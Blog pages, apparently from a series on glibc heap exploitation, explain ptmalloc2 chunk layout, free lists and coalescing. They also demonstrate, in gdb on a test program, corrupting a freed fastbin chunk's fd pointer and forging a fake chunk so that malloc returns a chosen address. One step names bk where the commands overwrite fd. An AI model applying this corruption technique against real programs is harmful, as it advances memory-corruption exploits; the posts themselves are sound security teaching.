Okay, so we know what they look like; let's talk about another important mechanism, the fastbin first fit.<br />
<h2 style="text-align: left;">
Fastbin First Fit</h2>
<br />
The fastbins have a slightly different reallocation dance: they sit in a Last In, First Out (LIFO) list while waiting to be reallocated. What this means is that if we free several chunks one after the other, the first one returned for re-allocation will be the last one we free'd.<br />
<br />
In the screenshot below; the memory dump on the left shows the state of the heap just before a malloc is called and <i>after</i> all the fastbin chunks have been free'd. On the right is the heap after the second malloc (<i>or reallocation</i>) has been called. So we should essentially see which fastbin chunks get returned and used and in which order (<i>mostly because I wrote some info into the heap chunks using the program - each allocation writes <span style="font-family: "courier new" , "courier" , monospace;">0xAA</span>, <span style="font-family: "courier new" , "courier" , monospace;">0xBB</span> into the heap in the order they are allocated in</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1clXxRYvqZ92iw0ccnZKgA6UYDu5crhgkx37tUWjyFJHO7d7npG3lZnH5VD1SgMWyPIyuLlAOdAqChXjm2pFgkKzjoYUhAsp6IK-gYQRuU7mr3XtVudcM95fIr1n5_LszvTL6A0FaKQ/s1600/LIFODemo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="573" data-original-width="1476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1clXxRYvqZ92iw0ccnZKgA6UYDu5crhgkx37tUWjyFJHO7d7npG3lZnH5VD1SgMWyPIyuLlAOdAqChXjm2pFgkKzjoYUhAsp6IK-gYQRuU7mr3XtVudcM95fIr1n5_LszvTL6A0FaKQ/s1600/LIFODemo.png" /></a></div>
<br />
You should be able to work out pretty easily which chunks came back first. Also please keep in mind the pointers showing up on the free list; these <span style="font-family: "courier new" , "courier" , monospace;">0x602yyy</span> looking values in the heap chunks are the <span style="font-family: Courier New, Courier, monospace;">malloc_chunk->fd</span> pointers.<br />
<br />
The next question you will naturally ask is: how do we make it return a pointer we want? Or, how do we influence the free chunks to force a certain one to be returned? What happens when we overwrite this information "in flight" and then see which fastbin chunk is returned? Well, here's a recipe for testing this out:<br />
<ol style="text-align: left;">
<li>Free up some chunks</li>
<li>Re-point the <span style="font-family: Courier New, Courier, monospace;">malloc_chunk->bk</span> pointers of the fastbins</li>
<li>Check out which of the available chunks get <span style="font-family: Courier New, Courier, monospace;">0x4242 </span>written into them (<i>again, this 0x4242/0x4141 stuff is purely because I'm making the program paint the heap helpfully for me</i>)</li>
</ol>
<div>
Let's see what this looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiby2evwXuPSTZzY03AVJxcqf6t1-qKEWW34FITX6Iy1QoOfUeN2rIDhwJ6yHu63ygCCYcHCaU5weIDjmnCdy-0zuEGMbodTK0Y1zrawO8GtJfMfGl3t_qkwZ4F2KoMofPEH_f27DZoN-I/s1600/redirection_fastbin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="667" data-original-width="691" height="617" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiby2evwXuPSTZzY03AVJxcqf6t1-qKEWW34FITX6Iy1QoOfUeN2rIDhwJ6yHu63ygCCYcHCaU5weIDjmnCdy-0zuEGMbodTK0Y1zrawO8GtJfMfGl3t_qkwZ4F2KoMofPEH_f27DZoN-I/s640/redirection_fastbin.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
So just to explain: first I overwrite the <span style="font-family: Courier New, Courier, monospace;">fd </span>pointer with the <span style="font-family: "courier new" , "courier" , monospace;">set {size_t} 0x602100 = 0x0000000000602000</span> command, which essentially tells malloc that after the first fastbin chunk is returned (<i>the first one in the LIFO, at <span style="font-family: "courier new" , "courier" , monospace;">0x6020f0</span></i><span style="font-family: inherit;">, whose fd field sits at 0x6020f0 + 0x10 = 0x602100) it should follow the linked list to the "next" free fastbin chunk, which is at </span><span style="font-family: "courier new" , "courier" , monospace;">0x0602000</span><span style="font-family: inherit;">. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The next screenshot shows how allocation was redirected; instead of allocating the next chunk just above the bottom most one, it jumps all the way to the top:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuwPeJ0JbVeZixCK0856vlOBATtMkXIpprSYX8nRX7WLLHtV2wc8bJpY2ewiZ-VnNQrzDmv_rTebbYI_HCASt_wg8PIAEoAa13RMIpNyhdpzXoxs5jvktO76Buy2HB7J-EqjY5MNgXjQs/s1600/redirected_fastbin_proof+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="579" data-original-width="769" height="481" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuwPeJ0JbVeZixCK0856vlOBATtMkXIpprSYX8nRX7WLLHtV2wc8bJpY2ewiZ-VnNQrzDmv_rTebbYI_HCASt_wg8PIAEoAa13RMIpNyhdpzXoxs5jvktO76Buy2HB7J-EqjY5MNgXjQs/s640/redirected_fastbin_proof+%25282%2529.png" width="640" /></a></div>
<br /></div>
One can clearly see, we just redirected the heap reallocation! The linked list powers belong to us now!!<br />
<br />
You can also redirect the heap to a fake chunk somewhere else in a readable and writable portion of memory. To do this, the following needs to be done:<br />
<ol style="text-align: left;">
<li>Free all the fastbin chunks</li>
<li>Just before the first re-alloc, re-point the fastbin chunk that's going to be first fitted at your fake chunk, for instance like so: <span style="font-family: "courier new" , "courier" , monospace;">set {size_t} 0x602100 = 0x601050 </span><span style="font-family: inherit;">(this sets the fd pointer of the chunk at </span><span style="font-family: Courier New, Courier, monospace;">0x6020f0</span><span style="font-family: inherit;">)</span></li>
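<li>Set the size field of the fake chunk to something acceptable: glibc checks that a chunk taken off a fastbin has a size belonging to that same fastbin, so here I'm just recycling the same size as the chunk being replaced (<i>0x50, plus the PREV_INUSE bit</i>), like this: <span style="font-family: "courier new" , "courier" , monospace;">set {size_t} 0x601058 = 0x0000000000000051</span></li>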
</ol>
The below screenshot shows that this was achieved. We can see a weird heap chunk hanging out in the <span style="font-family: "courier new" , "courier" , monospace;">0x6010yy</span> address region while the rest of the chunks are in the <span style="font-family: "courier new" , "courier" , monospace;">0x6020yy</span> range:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeXNYqFKuVxO0L0jMmFGGL2JaghyphenhyphenwNQH32SxuSlC5D_o2GHEDVUY39E5mVQxoylIL9VgRaj9IXVvi9UnF4G5k0lJQ36wfoySU3YdOsJALJ9XrDXSfp4qkxm2YcIVqxtvbSlcjm7URv80/s1600/chunk-redirection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="701" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeXNYqFKuVxO0L0jMmFGGL2JaghyphenhyphenwNQH32SxuSlC5D_o2GHEDVUY39E5mVQxoylIL9VgRaj9IXVvi9UnF4G5k0lJQ36wfoySU3YdOsJALJ9XrDXSfp4qkxm2YcIVqxtvbSlcjm7URv80/s1600/chunk-redirection.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
This is not a full on security exploit, but it definitely inches us closer to one. And it also introduces an important little trick for getting the heap to do reliably weird things lol.<br />
<br />
This is pretty much it for this post; I'll be covering more heap metadata in the next post. Stay tuned!<br />
<br />
<h2 style="text-align: left;">
References and Reading</h2>
<ol style="text-align: left;">
<li>Malloc.c <a href="https://fossies.org/linux/glibc/malloc/malloc.c">https://fossies.org/linux/glibc/malloc/malloc.c</a></li>
<li>"How2heap" - <a href="https://github.com/shellphish/how2heap">https://github.com/shellphish/how2heap</a> </li>
<li><a href="https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf">https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf</a> </li>
<li><a href="https://www.contextis.com/media/downloads/Glibc_Adventures__The_forgotten_chunks.pdf">https://www.contextis.com/media/downloads/Glibc_Adventures__The_forgotten_chunks.pdf</a> </li>
</ol>
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-8881237464434416792018-11-25T00:10:00.001-08:002018-12-06T22:13:25.520-08:00Glibc Heap Exploitation Basics : Introduction to ptmalloc2 internals (Part 1)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this post and the others in this series, I will unpack some of the internals of glibc's dynamic heap data structures and associated beasts. This post specifically assumes no background knowledge of the heap (perhaps a little on ELF internals and debugging), and details some experiments you can perform to learn how the heap works.<br />
<br />
<h2 style="text-align: left;">
Introduction </h2>
<br />
The heap is essentially a list of memory regions an executing program uses to store data. Heap regions are requested at runtime, which allows runtime environments like glibc to offer programs dynamic memory for allocating data. Because the heap offers memory regions as a kind of "service" (<i>this is what it is for - giving out memory regions</i>), somewhere in this whole mess there needs to be some accounting information about those regions. To this end, the heap describes or decorates user data regions with an internal structure called a <span style="font-family: "courier new" , "courier" , monospace;">chunk</span>. Chunks are in turn classified and grouped according to their properties - basically properties like:<br />
<br />
<ul style="text-align: left;">
<li>whether they are available for use, </li>
<li>how big they are, </li>
<li>and which chunks are around them in the list and other wonderful things. </li>
</ul>
The big TL;DR for heap management is that most of what it does boils down to elaborate dances around searching through chunks, either to free them or to allocate them.<br />
<br />
The heap allocator I will focus on here is glibc's ptmalloc as implemented in glibc versions 2.23-2.28. This is of course not to say that only glibc is worth understanding; there are multiple approaches to heap allocation. Each approach is unique down to how it achieves various operations, like coalescing free chunks, sorting, searching and grouping free chunks quickly, and, perhaps most interesting to us, security hardening. So there are a number of places where complexity can breed and fester into security problems. But the root of these problems will often be in how the users requesting memory, and the allocator managing it, respond to meta-data about memory regions.<br />
<i><br /></i>To close the introduction: the heap can often seem intense and complex, with very gnarly internals, but most of that machinery is caching and other computer science that serves to speed up searching linked lists. Another way to say this is that the internals are nothing more than elaborate ways to store some "cheat" meta-data so the allocator doesn't have to search the whole heap memory area every time. That meta-data is interesting to us because there are instances when we want to influence the way the list is searched and interpreted.<br />
<br />
<h2 style="text-align: left;">
Heap speak</h2>
The basic unit of currency for the heap as you would have guessed is a <span style="font-family: "courier new" , "courier" , monospace;">chunk</span>. We probably want to know what these look like in glibc code, so here ya go:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTMQa9xduLgu1U5y10UCuO4Gk412YTt7dAo62hujEmDjaNLsYXqt3umGUuWNDMtVApS6zVYdJYTJgSB6sA85yVh_spvcIYpjTOVyr57-DUVeRoopjrqKYsjvNVSk3XODPpwIyGc9idwY/s1600/Screenshot+from+2018-12-05+14-01-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="557" data-original-width="1155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTMQa9xduLgu1U5y10UCuO4Gk412YTt7dAo62hujEmDjaNLsYXqt3umGUuWNDMtVApS6zVYdJYTJgSB6sA85yVh_spvcIYpjTOVyr57-DUVeRoopjrqKYsjvNVSk3XODPpwIyGc9idwY/s1600/Screenshot+from+2018-12-05+14-01-20.png" /></a></div>
<br />
I should give each field its fair explanation (<i>well as fair as I can be to it</i>):<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> - is something I should probably explain first. It is the type glibc uses for the "bookkeeping" size fields in heap management, namely the chunk size fields (including the flag bits packed into them). Its width is left implementation defined: glibc wants to be portable and flexible across different hardware and runtime implementations, so the size mapped to <span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> can (though I don't think it often does) vary. By default, <span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> is defined to be <span style="font-family: "courier new" , "courier" , monospace;">size_t</span>, which falls back on however your C runtime originally solved the problem. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">mchunk_prev_size</span> - is the very first field of a chunk, present in both free and used chunks. If the chunk physically just before this one is free, this field holds that chunk's size; if the previous chunk is in use, the allocator doesn't need the field and the previous chunk's user data may spill into it. Whether the previous chunk is free is not recorded here but in the least significant bit of <span style="font-family: "courier new" , "courier" , monospace;">mchunk_size</span> (the <span style="font-family: "courier new" , "courier" , monospace;">PREV_INUSE</span> bit, <span style="font-family: "courier new" , "courier" , monospace;">0x1</span>): if that bit is set, the chunk just before this one is still "alive". </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">mchunk_size</span> - pretty standard, it holds the size of the current chunk in bytes, including the header overhead. Since chunk sizes are always multiples of at least 8, the low three bits are free to carry flags: <span style="font-family: "courier new" , "courier" , monospace;">PREV_INUSE</span> (0x1), <span style="font-family: "courier new" , "courier" , monospace;">IS_MMAPPED</span> (0x2) and <span style="font-family: "courier new" , "courier" , monospace;">NON_MAIN_ARENA</span> (0x4). So a size field of <span style="font-family: "courier new" , "courier" , monospace;">0x91</span> describes a 0x90-byte chunk whose previous neighbour is in use.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk* fd </span>- so this is a field in the chunk struct defining a space for an address to another chunk. This is because it forms a linked list. This linked list being defined here is the "free list", which snaps together all the chunks that are free on the heap. Here we are defining the "forward pointer" in the linked list.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk *bk</span> - you guessed it, this is the same type as the previous field, we are just talking about the "backward pointer" here. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk *fd_nextsize</span> - so this field is from another layer of free-listing tech in the heap. This pointer (along with its partner <span style="font-family: "courier new" , "courier" , monospace;">bk_nextsize</span>) is only used in a free chunk above a certain size threshold (we will cover this later on), so that the heap manager can track huge chunks should they appear. <i>It's kinda like being a high roller in a casino: when you come out they track your movements and wants even more intensely because you affect the profitability of the evening more</i>.</li>
</ul>
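To make the field list concrete, here's a minimal sketch that mirrors the field order of glibc's <span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk</span> (including <span style="font-family: "courier new" , "courier" , monospace;">bk_nextsize</span>) and prints where each field lands. The struct and function names are hypothetical, and it assumes <span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> is <span style="font-family: "courier new" , "courier" , monospace;">size_t</span>, the glibc default:<br />

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Assumption: INTERNAL_SIZE_T is size_t, the glibc default. */
typedef size_t demo_internal_size_t;

/* Hypothetical mirror of glibc's struct malloc_chunk (same field order). */
struct demo_malloc_chunk {
    demo_internal_size_t mchunk_prev_size;   /* size of previous chunk, if it is free */
    demo_internal_size_t mchunk_size;        /* chunk size incl. overhead; low 3 bits are flags */
    struct demo_malloc_chunk *fd;            /* forward link, free chunks only */
    struct demo_malloc_chunk *bk;            /* backward link, free chunks only */
    struct demo_malloc_chunk *fd_nextsize;   /* large free chunks only */
    struct demo_malloc_chunk *bk_nextsize;   /* large free chunks only */
};

/* Print the byte offset of each field within a chunk. */
void demo_print_chunk_layout(void)
{
    /* For an allocated chunk, user data starts where fd would be. */
    assert(offsetof(struct demo_malloc_chunk, fd) == 2 * sizeof(demo_internal_size_t));

    printf("mchunk_prev_size @ %zu\n", offsetof(struct demo_malloc_chunk, mchunk_prev_size));
    printf("mchunk_size      @ %zu\n", offsetof(struct demo_malloc_chunk, mchunk_size));
    printf("fd               @ %zu\n", offsetof(struct demo_malloc_chunk, fd));
    printf("bk               @ %zu\n", offsetof(struct demo_malloc_chunk, bk));
    printf("fd_nextsize      @ %zu\n", offsetof(struct demo_malloc_chunk, fd_nextsize));
    printf("bk_nextsize      @ %zu\n", offsetof(struct demo_malloc_chunk, bk_nextsize));
}
```

On x86-64 this reports offsets 0, 8, 16, 24, 32 and 40, which lines up with the <span style="font-family: "courier new" , "courier" , monospace;">$rax-0x10</span> trick used in the gdb session: the pointer malloc returns sits where <span style="font-family: "courier new" , "courier" , monospace;">fd</span> would be.<br />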
So we'd probably also want to see what this looks like in execution, and what different kinds of chunks look like (<i>free vs allocated</i>). We want to understand the base language of the heap internals before taking part in the conversation. So let's run a simple C program through gdb and unpack the heap to show how it responds internally. The program I'm going to be looking at is the following:<br />
<script src="https://gist.github.com/k3170makan/20e0d09524c95afd89d04d87bf00ee04.js"></script>
<br />
<br />
<i>I know it's a bit long-winded; you can totally skip over the other mallocs and frees if you don't want to go through each one. I added them to give my examples and reversing some more interesting data to work with</i>.<br />
<br />
In the code above I've added a simple makeshift "wrapper" function (<i>my friend Galen gave me this idea</i>) and injected a break point just before the last return. This is so that I can isolate the effects of each free and malloc call on the memory regions we are studying.<br />
<br />
And now let's see what happens to the heap as it allocates memory. We need to find a pointer to the heap first. This is pretty easy since malloc's return value lands in rax (the x86-64 return-value register) and is still there after returning back to the calling function; I show this in the first few gdb commands:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMz7frdm2LMLKwEQ-0wGxDqcjLktsdqaVuRhHZozBaeBItQ8Qmp5GLNxpZ6a9gvFxEfvXf5gAqyRA_pcY1H5isHAHZfetW7M_7JCquhQik3cr1uHItCByZwIQKhBZXqqYstPz4MEwCp5k/s1600/Screenshot+from+2018-12-02+13-12-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="662" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMz7frdm2LMLKwEQ-0wGxDqcjLktsdqaVuRhHZozBaeBItQ8Qmp5GLNxpZ6a9gvFxEfvXf5gAqyRA_pcY1H5isHAHZfetW7M_7JCquhQik3cr1uHItCByZwIQKhBZXqqYstPz4MEwCp5k/s640/Screenshot+from+2018-12-02+13-12-45.png" width="640" /></a></div>
<br />
<br />
As I have it set up, the hook-stop will just spit out everything around $rax-0x10, which is the address where the chunk header information is saved. I do this because when we hit this break point, malloc will have just returned and set the register to its return value, which is the address of the memory region allocated. We can see directly how these macros operate on heap meta-data in <a href="https://github.com/lattera/glibc/blob/master/malloc/malloc.c">glibc/malloc/malloc.c</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHipK5OH0mace23EFyw8tqXZn-iD6k8COgasJukj-3YfKh92VERHJVDhQNcftOunnrA_NKr9sgFlT5gJkjYbQB6FMs0LnWMOclRIOLZLlNsTpLsKXT1OlrQSatUQ_yj8aHCbQx1bqS_ZY/s1600/Screenshot+from+2018-12-02+13-14-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="210" data-original-width="1006" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHipK5OH0mace23EFyw8tqXZn-iD6k8COgasJukj-3YfKh92VERHJVDhQNcftOunnrA_NKr9sgFlT5gJkjYbQB6FMs0LnWMOclRIOLZLlNsTpLsKXT1OlrQSatUQ_yj8aHCbQx1bqS_ZY/s1600/Screenshot+from+2018-12-02+13-14-52.png" /></a></div>
<br />
<br />
So as you can see, it's a simple addition or subtraction of two words (2 * SIZE_SZ, i.e. 0x10 bytes on 64-bit) to get from the chunk to mem (<i>raw memory pointer to where user data starts</i>), or from mem back to the chunk header starting two words before. There are a number of other macros that extract and set other meta-data.<br />
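Here's the same pointer arithmetic as a small sketch on plain integers (no memory is touched). The helper names are hypothetical; the arithmetic mirrors glibc's <span style="font-family: "courier new" , "courier" , monospace;">chunk2mem</span>/<span style="font-family: "courier new" , "courier" , monospace;">mem2chunk</span>, assuming SIZE_SZ is <span style="font-family: "courier new" , "courier" , monospace;">sizeof(size_t)</span>:<br />

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: SIZE_SZ == sizeof(INTERNAL_SIZE_T) == sizeof(size_t). */
#define DEMO_SIZE_SZ (sizeof(size_t))

/* Chunk header address -> user pointer (what malloc hands back). */
static inline uintptr_t demo_chunk2mem(uintptr_t chunk)
{
    return chunk + 2 * DEMO_SIZE_SZ;
}

/* User pointer (what free receives) -> chunk header address. */
static inline uintptr_t demo_mem2chunk(uintptr_t mem)
{
    assert(mem % DEMO_SIZE_SZ == 0); /* malloc'd pointers are at least word aligned */
    return mem - 2 * DEMO_SIZE_SZ;
}
```

On x86-64, <span style="font-family: "courier new" , "courier" , monospace;">demo_mem2chunk(0x602010)</span> gives <span style="font-family: "courier new" , "courier" , monospace;">0x602000</span>, exactly the <span style="font-family: "courier new" , "courier" , monospace;">$rax-0x10</span> offset the hook-stop uses.<br />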
<br />
Okay, so that's the basic format pretty much covered; let's look at how this looks in action.<br />
<br />
<h2 style="text-align: left;">
Growing heap the natural way</h2>
After the first break point hits you should see gdb display the first heap chunk allocated, here's an annotated version of that dump showing the heap format:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkJeBv0MAEM_hEQk2q5vvVxA85s-gtv-ngCJDPFLMKlFgqhbon2ci7gCKm0wDK2SKB7b4cNdwqfHa1fTqRNa3NjvnPqQSFxhxKcX3Ta08eKm73YdRDItLnNqJnuZMjY4O7sr5jD5BD6o/s1600/allocated_chunk_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="1065" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkJeBv0MAEM_hEQk2q5vvVxA85s-gtv-ngCJDPFLMKlFgqhbon2ci7gCKm0wDK2SKB7b4cNdwqfHa1fTqRNa3NjvnPqQSFxhxKcX3Ta08eKm73YdRDItLnNqJnuZMjY4O7sr5jD5BD6o/s1600/allocated_chunk_1.png" /></a></div>
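If you're wondering why the size field in a dump like this is a bit bigger than what the program asked for: malloc pads each request to a chunk size. The sketch below mirrors the arithmetic of glibc's <span style="font-family: "courier new" , "courier" , monospace;">request2size()</span>, assuming x86-64 defaults (SIZE_SZ 8, 16-byte alignment, 32-byte minimum chunk); the function name is hypothetical. Only one SIZE_SZ is added because an in-use chunk may spill into the next chunk's <span style="font-family: "courier new" , "courier" , monospace;">mchunk_prev_size</span> field:<br />

```c
#include <assert.h>
#include <stddef.h>

/* Assumed x86-64 glibc defaults. */
#define DEMO_SIZE_SZ           8u    /* sizeof(INTERNAL_SIZE_T) */
#define DEMO_MALLOC_ALIGN_MASK 15u   /* MALLOC_ALIGNMENT (16) - 1 */
#define DEMO_MINSIZE           32u   /* smallest chunk the allocator hands out */

/* Chunk size used for malloc(req): add room for the size field, round up
   to the alignment, and never go below the minimum chunk size. */
size_t demo_request2size(size_t req)
{
    size_t padded = req + DEMO_SIZE_SZ + DEMO_MALLOC_ALIGN_MASK;
    assert(padded > req); /* this sketch ignores overflowing requests */
    if (padded < DEMO_MINSIZE)
        return DEMO_MINSIZE;
    return padded & ~(size_t)DEMO_MALLOC_ALIGN_MASK;
}
```

For example, <span style="font-family: "courier new" , "courier" , monospace;">malloc(0x100)</span> gets a 0x110-byte chunk, which shows up in gdb as a size field of 0x111 when the chunk before it is in use.<br />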
<br />
<br />
Now after this hits your screen, try executing the "c" gdb command to skip to the next break point. You will get a couple more examples of allocated chunks until you see the following on your screen:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG23_3vXWRMbJSTZNhK2_HL9a1GcHGsVSkobq2Im1iddUzAnOAgV_4sDSmaPNg8Db29kml8XMgcqkKAzj8QyRL4oGm2876UsrQL5kobm955xMZm9zgouSSAyfE-UeDT-P7SFzGTlSmNo4/s1600/Screenshot+from+2018-12-05+19-48-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="248" data-original-width="1172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG23_3vXWRMbJSTZNhK2_HL9a1GcHGsVSkobq2Im1iddUzAnOAgV_4sDSmaPNg8Db29kml8XMgcqkKAzj8QyRL4oGm2876UsrQL5kobm955xMZm9zgouSSAyfE-UeDT-P7SFzGTlSmNo4/s1600/Screenshot+from+2018-12-05+19-48-01.png" /></a></div>
<br />
This is essentially showing that we can't use the value in <span style="font-family: Courier New, Courier, monospace;">$rax</span> in the hook-stop as before. As you would guess, this is because <span style="font-family: Courier New, Courier, monospace;">$rax</span> does not hold the memory pointer anymore; it's now embroiled in a free call so it holds some other value. Anyway, we can dump the chunk using the address passed to the <span style="font-family: Courier New, Courier, monospace;">free_string</span> function since it is conveniently displayed here for us. This is what the chunk looks like after it was freed:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm4YJhRnQq_JjXdKZaaQuPJqzWuiScPpj2yvuxapBNCZl6SJXpedUSd7aqRoE7FNXvRUi1dYXEFoOCbzCA44P8aymH2Udnk-yzUK_tECrnJzjtJYClq-Qpa1H7jqS8LRgYeldKLKJSvA/s1600/free_chunk_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="525" data-original-width="1118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm4YJhRnQq_JjXdKZaaQuPJqzWuiScPpj2yvuxapBNCZl6SJXpedUSd7aqRoE7FNXvRUi1dYXEFoOCbzCA44P8aymH2Udnk-yzUK_tECrnJzjtJYClq-Qpa1H7jqS8LRgYeldKLKJSvA/s1600/free_chunk_1.png" /></a></div>
<br />
What the screen dump above shows, in addition to the free chunk, is where the first free chunk's fd (<i>free list forward</i>) and bk (<i>free list backward</i>) pointers go. If we follow them using gdb's memory examiner, they eventually lead us to <span style="font-family: "courier new" , "courier" , monospace;">0x602a00</span>, which is the top chunk's address: the chunk sitting at the top of the currently allocated heap addresses.<br />
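The reason a lone free chunk's fd and bk lead back into the allocator's own bookkeeping, rather than to another heap chunk, is that free lists are circular doubly linked lists hanging off a bin head. Here's a simplified model of that; it's a sketch, not glibc's code: the names are hypothetical, and real glibc bins live inside the arena rather than as standalone structs. The unlink check follows the idea behind glibc's "corrupted double-linked list" test:<br />

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified chunk: only the free-list links matter here. */
struct demo_chunk {
    size_t prev_size;
    size_t size;
    struct demo_chunk *fd;
    struct demo_chunk *bk;
};

/* An empty bin is a head whose fd and bk point back at itself. */
void demo_bin_init(struct demo_chunk *bin)
{
    bin->fd = bin;
    bin->bk = bin;
}

/* Insert a freed chunk at the front of the bin. */
void demo_bin_insert(struct demo_chunk *bin, struct demo_chunk *p)
{
    assert(bin != NULL && p != NULL);
    p->fd = bin->fd;
    p->bk = bin;
    bin->fd->bk = p;
    bin->fd = p;
}

/* Remove p from its list. Returns 0 on success, or -1 if the neighbours
   don't point back at p (glibc would abort at this point instead). */
int demo_unlink(struct demo_chunk *p)
{
    struct demo_chunk *fd = p->fd;
    struct demo_chunk *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}
```

With a single chunk in the bin, both of its links point at the bin head, and the head's links point back at the chunk, which is the pattern you see when chasing fd and bk in gdb.<br />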
<br />
Okay, so that's what a chunk looks like when it's allocated and freed. Can we have a look at how chunks are coalesced into bigger free chunks? Yes, that's what the next section is for!<br />
<br />
<h2 style="text-align: left;">
Free Chunk Coalescence</h2>
After allocating the chunks, our program frees each one in the same order they were allocated. This means we can expect two chunks that were allocated next to each other to be freed right after each other as well, and as a result the two chunks get melded into one.<br />
<br />
Here's what that looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguaVtk-6Xm3m2yqBwu73qv43jv0FrBPgf_HLgevxsCf7f8BMnzcIYMfabo-J3K7e5M-vTlPoXRnJXATlSXtRAYgqBLS4CTM40S3IeBH0Ew72oJbPlLlZ5kF-NkbOd1nFlr5bsc-bCtUsE/s1600/coalesce+chunk+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguaVtk-6Xm3m2yqBwu73qv43jv0FrBPgf_HLgevxsCf7f8BMnzcIYMfabo-J3K7e5M-vTlPoXRnJXATlSXtRAYgqBLS4CTM40S3IeBH0Ew72oJbPlLlZ5kF-NkbOd1nFlr5bsc-bCtUsE/s1600/coalesce+chunk+%25282%2529.png" /></a></div>
<br />
<br />
On the left of the screen dump are the two chunks (<i>named chunk 1 and chunk 2</i>) at addresses <span style="font-family: Courier New, Courier, monospace;">0x602580</span> and <span style="font-family: Courier New, Courier, monospace;">0x6024a0</span>. On the right we have the new coalesced chunk at <span style="font-family: Courier New, Courier, monospace;">0x6024a0</span> of course, but this time the size field after coalescing is <span style="font-family: Courier New, Courier, monospace;">0x211</span> (which as indicated is simply <span style="font-family: Courier New, Courier, monospace;">0xe1 + 0x130</span>: the two chunk sizes 0xe0 and 0x130 added together, with the PREV_INUSE bit from 0xe1 carried along).<br />
